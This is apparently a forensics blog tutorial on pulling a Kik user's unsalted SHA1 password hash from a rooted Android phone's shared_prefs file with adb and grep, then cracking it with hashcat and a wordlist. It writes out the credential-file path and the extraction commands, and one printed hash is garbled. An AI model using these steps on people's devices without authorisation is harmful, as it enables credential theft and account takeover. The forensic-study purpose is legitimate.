How to crack a Kik user’s password without rate limiting
Kik is a messaging app for iOS and Android with millions of daily users. Even though it has allowed many people to connect with their friends across countries, it has also been used for notorious purposes. So finding a Kik user’s password can be crucial information for helping law enforcement in solving criminal cases.
For this to work, there are 4 criteria:
- The device must be running Android
- Physical access is required
- The device has to be rooted
- User has to be logged in to Kik
I know what you are thinking. Why are there so many criteria!? Might as well add a 5th criterion stating that the user must be willing to hand over their password to you.
Well here is the thing. We are looking at this from a digital forensics point of view and not an unethical hacking point of view. When a seized device gets given to a digital forensics team, if possible it gets rooted so that more data can be recovered. A possible goal for an unethical hacker would be to somehow get into the account and cause harm. But our main goal today is to find what the Kik user’s password is because if they are someone who uses the same password in multiple places, it could reveal a lot of information.
Let the cracking begin…
In order to crack the password, you need 2 tools:
Kik stores the user’s password as an unsalted SHA1 hash in /data/user/0/kik.android/shared_prefs/<long-string>.KikPreferences.xml where <long-string> is a type 4 UUID. Therefore we can use hashcatalong with a wordlist to crack the hash which will reveal the password for the Kik user.
Once you have plugged in the device to your computer, use the command below to start the ADB server as root.
$ adb rootTo make things easier, I have created the commands below to automate the process of fetching the hashed password:
$ XML_DATA=$(adb shell cat "/data/user/0/kik.android/shared_prefs/*.KikPreferences.xml"$ echo "$XML_DATA" | grep "CredentialData\.password" | grep -Eo "[0-9a-f]{5,40}"
For me, the result for the commands above was 0a66e107bb05fd282da95ef7155ef7155e7dd65e927894 , which is of course the hashed password. Store this hash in a text file for later use:
$ echo 0a66e107bb05fd282da95ef7155e7dd65e927894 > hash.txtWe can now use hashcat to crack this hash. I will be using the popular wordlist rockyou.txt which can be found with a quick Google search.
The annotated command below should give you an understanding of what the command that we are using to crack the hash means.
The command above should give you an output similar to the one shown below, where the password that matches the hash is found.
If you take the password, which in my case is bandit and try logging into the user’s account, you should be able to successfully login without any issues.
Conclusion
The limitation of using this method is that the password much must be in the wordlist otherwise this will not work. There are many other ways in which we could crack the password of a Kik user. For example, brute forcing through Kik’s login API but this would most likely lead to a rate limiting and a possible IP ban. This method of course does not help you get into the account of a Kik user but it does provide some good information for investigators.
Thank you for reading and I hope you enjoyed reading this writeup!
